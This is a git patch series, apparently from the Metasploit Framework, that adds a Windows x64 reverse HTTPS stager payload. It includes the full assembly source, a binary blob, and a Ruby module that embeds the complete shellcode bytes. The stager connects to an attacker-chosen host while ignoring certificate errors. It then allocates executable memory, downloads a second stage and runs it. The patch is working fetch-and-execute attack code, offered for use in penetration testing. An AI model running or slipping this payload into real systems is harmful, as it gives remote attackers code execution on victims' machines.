From 6db1fea6b98d91023079f2c58b1f850ea7ae437e Mon Sep 17 00:00:00 2001
From: agix <agix@shell-storm.org>
Date: Mon, 13 May 2013 01:41:56 +0200
Subject: [PATCH 1/2] create x64_reverse_https stagers

---
 .../windows/x64/bin/stager_reverse_https.bin  | Bin 0 -> 570 bytes
 .../x64/src/block/block_reverse_https.asm     | 157 ++++++++++++++++++
 .../x64/src/stager/stager_reverse_https.asm   |  19 +++
 .../stagers/windows/x64/reverse_https.rb      | 101 +++++++++++
 4 files changed, 277 insertions(+)
 create mode 100644 external/source/shellcode/windows/x64/bin/stager_reverse_https.bin
 create mode 100644 external/source/shellcode/windows/x64/src/block/block_reverse_https.asm
 create mode 100644 external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm
 create mode 100644 modules/payloads/stagers/windows/x64/reverse_https.rb

diff --git a/external/source/shellcode/windows/x64/bin/stager_reverse_https.bin b/external/source/shellcode/windows/x64/bin/stager_reverse_https.bin
new file mode 100644
index 0000000000000000000000000000000000000000..c19921552cce2d20569d10966d29cf72355c4aa0
GIT binary patch
literal 570
zcmez4(fs7YixUhC432@00YQOb9)_1vJ-UMufLH>E6+F6&0zCM)dwKa9p7bz0u*N2_
zhDk@k@!&~bN5+GX-Uc}af>d=o*?2HsNNcQ+;ASc<>Tc)&8tBn_pd=kA8qn<_;nMA(
z;K_L5ahS*dlaAdc9UhF=pyokMvUpJX(TCYbg~QeIV(E<tpn4Uc`ZULG9uFW}2FP~o
zW&vuu;27Z;5f>Q+q#_-oJeuDqI0pTH0OUk@bPK)o|NsAgtmnS+%)HFJ)Di~AFwf3s
zKAj&uclng7u>+mN@c(KSgGc8>peKC|4**@@7~mM-xyvf7aydly<!m4w<<WW2b4QFI
zNQi*}q$<!cFpJqS&~sOK=lo+J!T(oZR{~W5&2fwXDhSG8Fj~+O6y&+<b*P>-M1e==
zu`I55kIs)CyW~M4K#<X3%)sE;`M`503q*jyb62U`yfzT$|5cDun7e=`>9R>wLnK-c
zl&X0AKVKsJdgIGRpwNpZpf~jmjf_o989euW*t#eTY5*{Xb}=wGfOrg^I~WAO3<l4g
z4iE;=wumLcPeB}@ZIgq8JvyI*EbY7nRIC6|<JtMsbC=Mx&PPyH%|{e~(Kyqio85!)
SFfc|-&qYKWesSyH|Nj6s&(;wD

literal 0
HcmV?d00001

diff --git a/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm b/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm
new file mode 100644
index 0000000000..673cac7ccd
--- /dev/null
+++ b/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm
@@ -0,0 +1,157 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2003
+; Architecture: x64
+;-----------------------------------------------------------------------------;
+[BITS 64]
+
+; Input: RBP must be the address of 'api_call'.
+; Output: RDI will be the socket for the connection to the server
+; Clobbers: RAX, RCX, RDX, RDI, R8, R9, R10, R12, R13, R14, R15
+
+load_wininet:
+  ; setup the structures we need on the stack...
+  mov r14, 'wininet'
+  push r14               ; Push the bytes 'wininet',0 onto the stack.
+  mov r14, rsp           ; save pointer to the "wininet" string for LoadLibraryA call.
+  mov rcx, r14           ; set the param for the library to load
+  mov r10, 0x0726774C    ; hash( "kernel32.dll", "LoadLibraryA" )
+  call rbp               ; LoadLibraryA( "ws2_32" )
+
+internetopen:
+  push byte 0            ; NULL pointer
+  mov rcx, rsp           ; LPCTSTR lpszAgent ("\x00")
+  xor rdx, rdx           ; DWORD dwAccessType (PRECONFIG = 0)
+  xor r8, r8             ; LPCTSTR lpszProxyName
+  xor r9, r9             ; LPCTSTR lpszProxyBypass
+  push r8                ; DWORD dwFlags
+  push r8                ; alignment
+  mov r10, 0xA779563A    ; hash( "wininet.dll", "InternetOpenA" )
+  call rbp
+
+  jmp dbl_get_server_host
+
+internetconnect:
+  pop rdx                ; LPCTSTR lpszServerName
+  mov rcx, rax           ; HINTERNET hInternet
+  mov r8, 4444           ; PORT
+  xor r9, r9             ; LPCTSTR lpszUsername
+  push r9                ; DWORD_PTR dwContext (NULL)
+  push r9                ; DWORD dwFlags
+  push 3                 ; DWORD dwService (INTERNET_SERVICE_HTTP)
+  push r9                ; alignment
+  mov r10, 0xC69F8957    ; hash( "wininet.dll", "InternetConnectA" )
+  call rbp
+
+  jmp get_server_uri
+
+httpopenrequest:
+  mov rcx, rax           ; HINTERNET hConnect
+  xor rdx, rdx           ; LPCTSTR lpszVerb
+  pop r8                 ; LPCTSTR lpszObjectName
+  xor r9, r9             ; LPCTSTR lpszVersion
+  push rdx               ; DWORD_PTR dwContext
+  push qword (0x0000000080000000 | 0x0000000004000000 | 0x0000000000800000 | 0x0000000000200000 | 0x0000000000001000 |0x0000000000002000 |0x0000000000000200) ; dwFlags
+    ;0x80000000 |        ; INTERNET_FLAG_RELOAD
+    ;0x04000000 |        ; INTERNET_NO_CACHE_WRITE
+    ;0x00800000 |        ; INTERNET_FLAG_SECURE
+    ;0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
+    ;0x00001000 |        ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
+    ;0x00002000 |        ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
+    ;0x00000200          ; INTERNET_FLAG_NO_UI
+  push rdx               ; LPCTSTR *lplpszAcceptTypes
+  push rdx               ; LPCTSTR lpszReferer
+  mov r10, 0x3B2E55EB    ; hash( "wininet.dll", "HttpOpenRequestA" )
+  call rbp
+  mov rsi, rax
+
+retry:
+  push byte 10
+  pop rdi
+
+; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
+internetsetoption:
+  mov rcx, rsi           ; HINTERNET hInternet
+  mov rdx, 31            ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
+  push qword 0x00003380
+    ;0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
+    ;0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
+    ;0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
+    ;0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
+    ;0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
+  mov r8, rsp
+  mov r9, 4              ; sizeof(dwFlags)
+  mov r10, 0x869E4675    ; hash( "wininet.dll", "InternetSetOptionA" )
+  call rbp
+
+httpsendrequest:
+  mov rcx, rsi           ; HINTERNET hRequest
+  xor rdx, rdx           ; LPCTSTR lpszHeaders
+  xor r8, r8             ; DWORD dwHeadersLength
+  xor r9, r9             ; LPVOID lpOptional
+  push rdx               ; DWORD dwOptionalLength
+  mov r10, 0x7B18062D    ; hash( "wininet.dll", "HttpSendRequestA" )
+  call rbp
+  test eax,eax
+  jnz short allocate_memory
+
+try_it_again:
+  dec rdi
+  jz failure
+  jmp short internetsetoption
+
+dbl_get_server_host:
+  jmp get_server_host
+
+get_server_uri:
+  call httpopenrequest
+
+server_uri:
+ db "/12345", 0x00
+
+failure:
+  mov r14, 0x56A2B5F0    ; hardcoded to exitprocess for size
+  call rbp
+
+allocate_memory:
+  xor rcx, rcx           ; LPVOID lpAddress
+  mov rdx, 0x00400000    ; SIZE_T dwSize
+  mov r8, 0x1000         ; DWORD flAllocationType(MEM_COMMIT)
+  mov r9, 0x40           ; DWORD flProtect(PAGE_EXECUTE_READWRITE)
+  mov r10, 0xE553A458    ; hash( "kernel32.dll", "VirtualAlloc" )
+  call rbp
+
+download_prep:
+  xchg rax, rbx          ; place the allocated base address in ebx
+  push rbx               ; store a copy of the stage base address on the stack
+  push rbx               ; temporary storage for bytes read count
+  mov rdi, rsp           ; &bytesRead
+
+download_more:
+  mov rcx, rsi           ; HINTERNET hFile
+  mov rdx, rbx           ; LPVOID lpBuffer
+  mov r8, 8192           ; DWORD dwNumberOfBytesToRead
+  mov r9, rdi            ; LPDWORD lpdwNumberOfBytesRead
+  mov r10, 0xE2899612    ; hash( "wininet.dll", "InternetReadFile" )
+  call rbp
+  add rsp, 32            ; clean reserverd space
+
+  test eax,eax           ; download failed? (optional?)
+  jz failure
+
+  mov rax, [rdi]
+  add rbx, rax           ; buffer += bytes_received
+
+  test rax,rax           ; optional?
+  jnz download_more      ; continue until it returns 0
+  pop rax                ; clear the temporary storage
+  pop rax                ; f*cking alignment
+
+execute_stage:
+  ret                    ; dive into the stored stage address
+
+get_server_host:
+  call internetconnect
+
+server_host:
+
diff --git a/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm b/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm
new file mode 100644
index 0000000000..090bde4640
--- /dev/null
+++ b/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm
@@ -0,0 +1,19 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2003
+; Architecture: x64
+; Size: 422 bytes
+; Build: >build.py stager_reverse_https
+;-----------------------------------------------------------------------------;
+
+[BITS 64]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop rbp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_reverse_https.asm"
+  ; By here we will have performed the reverse_tcp connection and EDI will be our socket
\ No newline at end of file
diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb
new file mode 100644
index 0000000000..5a94bfd9ae
--- /dev/null
+++ b/modules/payloads/stagers/windows/x64/reverse_https.rb
@@ -0,0 +1,101 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_https'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Windows
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Windows x64 Reverse HTTPS Stager',
+			'Description'   => 'Tunnel communication over HTTP using SSL (Windows x64)',
+			'Author'        => 'hdm (x64 rewrite by agix)',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86_64,
+			'Handler'       => Msf::Handler::ReverseHttps,
+			'Convention'    => 'sockrdi https',
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
+							# 'EXITFUNC' => [ 290, 'V' ],
+							'LPORT'    => [ 282, 'v' ], # Not a typo, really little endian
+						},
+					'Payload' =>
+						"\xFC\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
+						"\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
+						"\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
+						"\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
+						"\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x66\x81\x78" +
+						"\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67" +
+						"\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56" +
+						"\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0" +
+						"\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24" +
+						"\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41" +
+						"\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01" +
+						"\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83" +
+						"\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF" +
+						"\xFF\xFF\x5D\x49\xBE\x77\x69\x6E\x69\x6E\x65\x74\x00\x41\x56\x49" +
+						"\x89\xE6\x4C\x89\xF1\x49\xBA\x4C\x77\x26\x07\x00\x00\x00\x00\xFF" +
+						"\xD5\x6A\x00\x48\x89\xE1\x48\x31\xD2\x4D\x31\xC0\x4D\x31\xC9\x41" +
+						"\x50\x41\x50\x49\xBA\x3A\x56\x79\xA7\x00\x00\x00\x00\xFF\xD5\xE9" +
+						"\x9B\x00\x00\x00\x5A\x48\x89\xC1\x49\xB8\x5C\x11\x00\x00\x00\x00" +
+						"\x00\x00\x4D\x31\xC9\x41\x51\x41\x51\x6A\x03\x41\x51\x49\xBA\x57" +
+						"\x89\x9F\xC6\x00\x00\x00\x00\xFF\xD5\xEB\x79\x48\x89\xC1\x48\x31" +
+						"\xD2\x41\x58\x4D\x31\xC9\x52\x68\x00\x32\xA0\x84\x52\x52\x49\xBA" +
+						"\xEB\x55\x2E\x3B\x00\x00\x00\x00\xFF\xD5\x48\x89\xC6\x6A\x0A\x5F" +
+						"\x48\x89\xF1\x48\xBA\x1F\x00\x00\x00\x00\x00\x00\x00\x68\x80\x33" +
+						"\x00\x00\x49\x89\xE0\x49\xB9\x04\x00\x00\x00\x00\x00\x00\x00\x49" +
+						"\xBA\x75\x46\x9E\x86\x00\x00\x00\x00\xFF\xD5\x48\x89\xF1\x48\x31" +
+						"\xD2\x4D\x31\xC0\x4D\x31\xC9\x52\x49\xBA\x2D\x06\x18\x7B\x00\x00" +
+						"\x00\x00\xFF\xD5\x85\xC0\x75\x24\x48\xFF\xCF\x74\x13\xEB\xB1\xE9" +
+						"\x81\x00\x00\x00\xE8\x82\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00" +
+						"\x49\xBE\xF0\xB5\xA2\x56\x00\x00\x00\x00\xFF\xD5\x48\x31\xC9\x48" +
+						"\xBA\x00\x00\x40\x00\x00\x00\x00\x00\x49\xB8\x00\x10\x00\x00\x00" +
+						"\x00\x00\x00\x49\xB9\x40\x00\x00\x00\x00\x00\x00\x00\x49\xBA\x58" +
+						"\xA4\x53\xE5\x00\x00\x00\x00\xFF\xD5\x48\x93\x53\x53\x48\x89\xE7" +
+						"\x48\x89\xF1\x48\x89\xDA\x49\xB8\x00\x20\x00\x00\x00\x00\x00\x00" +
+						"\x49\x89\xF9\x49\xBA\x12\x96\x89\xE2\x00\x00\x00\x00\xFF\xD5\x48" +
+						"\x83\xC4\x20\x85\xC0\x74\x99\x48\x8B\x07\x48\x01\xC3\x48\x85\xC0" +
+						"\x75\xCE\x58\x58\xC3\xE8\xDA\xFE\xFF\xFF"
+				}
+			))
+	end
+
+	#
+	# Do not transmit the stage over the connection.  We handle this via HTTPS
+	#
+	def stage_over_connection?
+		false
+	end
+
+	#
+	# Generate the first stage
+	#
+	def generate
+		p = super
+		i = p.index("/12345\x00")
+		u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
+		p[i, u.length] = u
+		p + datastore['LHOST'].to_s + "\x00"
+	end
+
+	#
+	# Always wait at least 20 seconds for this payload (due to staging delays)
+	#
+	def wfs_delay
+		20
+	end
+end

From b92ae7779e34c17cb19f58a87eb8edbe0397df0d Mon Sep 17 00:00:00 2001
From: agix <agix@shell-storm.org>
Date: Sun, 19 May 2013 16:16:25 +0200
Subject: [PATCH 2/2] change author name

---
 .../shellcode/windows/x64/src/block/block_reverse_https.asm  | 3 ++-
 .../windows/x64/src/stager/stager_reverse_https.asm          | 5 +++--
 2 files changed, 5 insertions(+), 3 deletions(-)

diff --git a/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm b/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm
index 673cac7ccd..93480ce9b4 100644
--- a/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm
+++ b/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm
@@ -1,6 +1,7 @@
 ;-----------------------------------------------------------------------------;
 ; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-; Compatible: Windows 7, 2003
+; Rewrited to x64 by agix
+; Compatible: Windows 7
 ; Architecture: x64
 ;-----------------------------------------------------------------------------;
 [BITS 64]
diff --git a/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm b/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm
index 090bde4640..6b22fe6bba 100644
--- a/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm
+++ b/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm
@@ -1,8 +1,9 @@
 ;-----------------------------------------------------------------------------;
 ; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-; Compatible: Windows 7, 2003
+; Rewrited to x64 by agix
+; Compatible: Windows 7
 ; Architecture: x64
-; Size: 422 bytes
+; Size: 570 bytes
 ; Build: >build.py stager_reverse_https
 ;-----------------------------------------------------------------------------;